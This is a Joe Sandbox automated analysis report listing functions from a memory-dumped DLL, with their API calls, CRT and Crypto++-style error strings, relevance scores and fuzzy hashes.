Opcode ID: 695da144520d05474cb1412bd6c68bf9973f524bf5f7e053ad41cc063d045753
Instruction ID: 0119166ba09dcfc2d982dee0b51fa8bc7b45dfa82e88f2cee117747c36f98e1f
Opcode Fuzzy Hash: 695da144520d05474cb1412bd6c68bf9973f524bf5f7e053ad41cc063d045753
Instruction Fuzzy Hash: DEC19D7050D780AEE324CB28C850B8FB7E5BFD9214F444EADE5998B391DB759908C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 6F8DBE8E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6F8DBEB6

Part of subcall function 6F8DAB70: __getptd.LIBCMT ref: 6F8DAB7E
Part of subcall function 6F8DAB70: __getptd.LIBCMT ref: 6F8DAB8C

__getptd.LIBCMT ref: 6F8DBEC0

Part of subcall function 6F8DEAE6: __getptd_noexit.LIBCMT ref: 6F8DEAE9
Part of subcall function 6F8DEAE6: __amsg_exit.LIBCMT ref: 6F8DEAF6

__getptd.LIBCMT ref: 6F8DBECE
__getptd.LIBCMT ref: 6F8DBEDC
__getptd.LIBCMT ref: 6F8DBEE7
_CallCatchBlock2.LIBCMT ref: 6F8DBF0D

Part of subcall function 6F8DAC15: __CallSettingFrame@12.LIBCMT ref: 6F8DAC61

Part of subcall function 6F8DBFB4: __getptd.LIBCMT ref: 6F8DBFC3
Part of subcall function 6F8DBFB4: __getptd.LIBCMT ref: 6F8DBFD1

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: f3f59c10e7af886cfe5cd623d1d871eb197f539b498ef6ede16975bc8e45fb40
Instruction ID: 043de65c1e64857793788bebf67bb2495cc1ed8ccd4033d868c2096607116102
Opcode Fuzzy Hash: f3f59c10e7af886cfe5cd623d1d871eb197f539b498ef6ede16975bc8e45fb40
Instruction Fuzzy Hash: 8B11C9B1D00309EFDB14DFA8C545A9EBBB1FF04318F1089A9F814AB290DB389A559F50

Uniqueness

Uniqueness Score: -1.00%

Function 6F8A70E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 187COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6F8A7267

Strings

is less than the minimum of , xrefs: 6F8A71D0
: IV length , xrefs: 6F8A719E, 6F8A72D7
exceeds the maximum of , xrefs: 6F8A7309

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8Throw
String ID: exceeds the maximum of $ is less than the minimum of $: IV length
API String ID: 2005118841-1273958906
Opcode ID: 980c4ad2ca408c36519545b813dd7b8ef6b9968e774b04ffffabe812345abf67
Instruction ID: ccb0b9728d2888dcfd3c4b85f605c008b7f4fdee685d6d801dbe9a135c1e3ca4
Opcode Fuzzy Hash: 980c4ad2ca408c36519545b813dd7b8ef6b9968e774b04ffffabe812345abf67
Instruction Fuzzy Hash: A9616071108380AFD321DB68C884FDFB7E8AFD9344F104E5DE1998B291DB75A905C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 6F8CAE90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6F8CAF27
_strncmp.LIBCMT ref: 6F8CAFA6

Strings

ThisPointer:, xrefs: 6F8CAF4B, 6F8CAFA0
ValueNames, xrefs: 6F8CAEB7

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: eea37a33aa6a78cbbd6554b938a43e8111376a4626caf4cf62378a4b4ccf2e96
Instruction ID: 8df0af0419b134254300020d12c06ed60a28287086119d18c6ecbf0870a46b9a
Opcode Fuzzy Hash: eea37a33aa6a78cbbd6554b938a43e8111376a4626caf4cf62378a4b4ccf2e96
Instruction Fuzzy Hash: 0251D6712087446BC318DF68C8A0A67B7EAAF85358F044E9DF9D68F391D722F909C752

Uniqueness

Uniqueness Score: -1.00%

Function 6F8AA360 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6F8AA3F7
_strncmp.LIBCMT ref: 6F8AA476

Strings

ThisPointer:, xrefs: 6F8AA41B, 6F8AA470
ValueNames, xrefs: 6F8AA387

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: ebc532272d663f63d1607cd2c4689e0ca0c629ab04838d7619c2d119ef589e2f
Instruction ID: 084d1cf546aaa9720735179ccc969dd39ab8da41b9217d16a694ea8437cac7cb
Opcode Fuzzy Hash: ebc532272d663f63d1607cd2c4689e0ca0c629ab04838d7619c2d119ef589e2f
Instruction Fuzzy Hash: 4D51C431208744ABC3189F68D890A67B7EAEFC6358F044E9DF5968FA81D727F809C751

Uniqueness

Uniqueness Score: -1.00%

Function 6F8CB9B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6F8CBA47
_strncmp.LIBCMT ref: 6F8CBAC6

Strings

ThisPointer:, xrefs: 6F8CBA6B, 6F8CBAC0
ValueNames, xrefs: 6F8CB9D7

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: e5e91450ba9a3291f044c84bf833ecfd4268034d336fe19eb86267a0893e4792
Instruction ID: 0ec070312e0d5684696f63881aa3e1d6205928c5b88a585ca07f9f76d949a840
Opcode Fuzzy Hash: e5e91450ba9a3291f044c84bf833ecfd4268034d336fe19eb86267a0893e4792
Instruction Fuzzy Hash: BB51F6712087449BC318CF69D890A67B7EAAF86358F044E9DF5D68F281D722F809C752

Uniqueness

Uniqueness Score: -1.00%

Function 6F8B1B70 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6F8B1C1A

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

__CxxThrowException@8.LIBCMT ref: 6F8B1CDE
__CxxThrowException@8.LIBCMT ref: 6F8B1D3E

Strings

TF_SignerBase: this algorithm does not support messsage recovery or the key is too short, xrefs: 6F8B1C67
TF_SignerBase: the recoverable message part is too long for the given key and algorithm, xrefs: 6F8B1CF0

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: TF_SignerBase: the recoverable message part is too long for the given key and algorithm$TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
API String ID: 3476068407-3371871069
Opcode ID: 1a61ced2472951cec96a18011f2c8b5ca637b9bee3565ad4fdd655cb2465aab4
Instruction ID: 3709068e6cac71c222298b3b00a463aa399654743836ad806f9dea1e24c7bc76
Opcode Fuzzy Hash: 1a61ced2472951cec96a18011f2c8b5ca637b9bee3565ad4fdd655cb2465aab4
Instruction Fuzzy Hash: D1514B71208740AFD364DF68C880F5EB7E9BFC8314F108A5DE5998B391DB74A945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6F874010 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6F87402A

Part of subcall function 6F8D9125: std::exception::exception.LIBCMT ref: 6F8D913A
Part of subcall function 6F8D9125: __CxxThrowException@8.LIBCMT ref: 6F8D914F
Part of subcall function 6F8D9125: std::exception::exception.LIBCMT ref: 6F8D9160

std::_Xinvalid_argument.LIBCPMT ref: 6F874067

Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D90ED
Part of subcall function 6F8D90D8: __CxxThrowException@8.LIBCMT ref: 6F8D9102
Part of subcall function 6F8D90D8: std::exception::exception.LIBCMT ref: 6F8D9113

_memmove.LIBCMT ref: 6F8740C8

Strings

string too long, xrefs: 6F874062
invalid string position, xrefs: 6F874025

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: 0959eb5664bab29277715b6fea9e2ddf0d3469ae85b4c8ee44a6f2e62dda0c38
Instruction ID: 0060d199bb20c5acfc67a7679199b12d9ddcc4d1e21f322f0a4b6d4a5a77f55c
Opcode Fuzzy Hash: 0959eb5664bab29277715b6fea9e2ddf0d3469ae85b4c8ee44a6f2e62dda0c38
Instruction Fuzzy Hash: 5F318232304214DBDB319E5CA880B5EF7A9FFD1665F210EAFE151CF291DB62A84187A1

Uniqueness

Uniqueness Score: -1.00%

Function 6F8DC23B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6F8DC24E

Part of subcall function 6F8DC1A9: ___BuildCatchObjectHelper.LIBCMT ref: 6F8DC1DF

_UnwindNestedFrames.LIBCMT ref: 6F8DC265
___FrameUnwindToState.LIBCMT ref: 6F8DC273

Strings

csm, xrefs: 6F8DC23D
csm, xrefs: 6F8DC24A, 6F8DC25F, 6F8DC272, 6F8DC290, 6F8DC2A0

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
Instruction ID: 6c1ac093a19f96e4a97d23af4ef628cf9a06091166ac6629fa6d4479dd8590cc
Opcode Fuzzy Hash: 2a3f766c9b4dac2ca2754d74b5085f77c001a70fed88627ce95d418e20d78339
Instruction Fuzzy Hash: CA01F631401209BBDF125F95CC45EEA7F6AFF09398F104890FD18692A1D736E9B2DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6F8B2300 Relevance: 7.8, APIs: 5, Instructions: 257COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6F8B23F3
_memmove.LIBCMT ref: 6F8B2460

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: be0019b6c7c21dea26e0a66b37f35e90b28bcb8dee0afa74a14831eb5ed0f903
Instruction ID: 54946375e8aa5f165c2b957214dfc4cf277edb4cdc3f056752835e3c0db00897
Opcode Fuzzy Hash: be0019b6c7c21dea26e0a66b37f35e90b28bcb8dee0afa74a14831eb5ed0f903
Instruction Fuzzy Hash: 19915D712087019FD719DF68D980A6BB7E9BF88714F104EADE495CB740E738E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6F8A1D50 Relevance: 7.6, APIs: 5, Instructions: 144timesleepCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(8E16AAE4), ref: 6F8A1D91
timeGetTime.WINMM(8E16AAE4), ref: 6F8A1D9F
timeGetTime.WINMM ref: 6F8A1DBB
timeGetTime.WINMM ref: 6F8A1DC9
Sleep.KERNEL32(00000032), ref: 6F8A1DDC

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Timetime$Sleep
String ID:
API String ID: 4176159691-0
Opcode ID: cbb4cec1aff68270c89649f15e814711a60875e29d68ed0e73f7e0b24e644ce7
Instruction ID: 571ed1a2f400f5a754819ef1f71e8a16b5f6a218b746ac3f833b80e6430e5683
Opcode Fuzzy Hash: cbb4cec1aff68270c89649f15e814711a60875e29d68ed0e73f7e0b24e644ce7
Instruction Fuzzy Hash: 8851BEB1D05748AFEB05DFA8C981B9DBBB8FB05354F1449BAE418DF280D371A950CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F886D40 Relevance: 7.6, APIs: 5, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

_rand.LIBCMT ref: 6F886DEA

Part of subcall function 6F8D9E0C: __getptd.LIBCMT ref: 6F8D9E0C

std::exception::exception.LIBCMT ref: 6F886E17
__CxxThrowException@8.LIBCMT ref: 6F886E2C
std::exception::exception.LIBCMT ref: 6F886E3B
__CxxThrowException@8.LIBCMT ref: 6F886E50

Part of subcall function 6F8D9BB5: std::exception::exception.LIBCMT ref: 6F8D9C04
Part of subcall function 6F8D9BB5: std::exception::exception.LIBCMT ref: 6F8D9C1E
Part of subcall function 6F8D9BB5: __CxxThrowException@8.LIBCMT ref: 6F8D9C2F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$__getptd_malloc_rand
String ID:
API String ID: 2791304714-0
Opcode ID: b013fbd39ba5cf5fb4bf356d3dd1405cdac520507d106325c86820ce7ef8c5b7
Instruction ID: 4bba99cdb97642d20927e1925698cfe54f8f521aaec031468e1fe9877acbb229
Opcode Fuzzy Hash: b013fbd39ba5cf5fb4bf356d3dd1405cdac520507d106325c86820ce7ef8c5b7
Instruction Fuzzy Hash: 3A3139B1900708AFC750CF68C880A9AFBF4FF19314F5489AEE85A9B781D771E505CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6F887750 Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6F887761
LeaveCriticalSection.KERNEL32(00000000,?), ref: 6F887782
EnterCriticalSection.KERNEL32(00000018), ref: 6F887796
LeaveCriticalSection.KERNEL32(00000018), ref: 6F8877CE
QueueUserWorkItem.KERNEL32(6F8A1D50,00000000,00000010), ref: 6F88780C

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ItemQueueUserWork
String ID:
API String ID: 584243675-0
Opcode ID: af814a84a7cc66dece25d861f5c209fbf866744c15b09c8e3bb4f1a06883ef00
Instruction ID: 96c6dcd3df5fd26466200ace218e5861b3599c7fec9aa7376347910d6079fede
Opcode Fuzzy Hash: af814a84a7cc66dece25d861f5c209fbf866744c15b09c8e3bb4f1a06883ef00
Instruction Fuzzy Hash: 9E216072605608AFDB54DF64D984E9FBBF8FF85354F00899AE8668B640D730F548CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F875AAC Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6F875ACB

Part of subcall function 6F8D9533: std::exception::_Copy_str.LIBCMT ref: 6F8D954E

__CxxThrowException@8.LIBCMT ref: 6F875ABC

Part of subcall function 6F8DAC75: RaiseException.KERNEL32(?,?,6F8D9C34,8E16AAE4,?,?,?,?,6F8D9C34,8E16AAE4,6F909C90,6F91B974,8E16AAE4), ref: 6F8DACB7

__CxxThrowException@8.LIBCMT ref: 6F875AE0

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

std::exception::exception.LIBCMT ref: 6F875B18
__CxxThrowException@8.LIBCMT ref: 6F875B2D

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 921928366-0
Opcode ID: fc7e9bbbd8b044730d078ed8f07483789293e9bfbed53ae7e5cd2e1f9207ad40
